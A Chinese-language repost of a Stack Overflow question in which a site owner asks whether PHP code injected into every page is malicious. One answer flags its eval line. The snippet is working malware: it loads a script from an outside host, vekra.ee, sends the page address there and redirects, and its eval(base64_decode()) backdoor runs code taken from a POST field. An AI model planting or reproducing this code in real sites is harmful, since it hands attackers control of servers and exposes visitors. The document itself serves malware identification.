gpt4 book ai didi

php - 这个 php 脚本会做什么?是恶意的php代码吗?

转载 作者:塔克拉玛干 更新时间:2023-11-03 05:42:30 26 4
gpt4 key购买 nike

有人可以告诉我这段 php 代码会做什么吗?我只在每个 .php 页面上找到了这段代码。 js/css/php.ini 等其他页面都可以。这是恶意代码吗?如果是,请建议如何防止恶意事件。

代码如下:

global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if(!@$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!@headers_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!@headers_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
$sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}

最佳答案

我还没有仔细检查过它,但只有这条线

eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));

已经向我表明它是恶意的,如果不是恶意的,那么非常非常接近 - 可能存在代码注入(inject)。

关于php - 这个 php 脚本会做什么?是恶意的php代码吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/7412267/

26 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com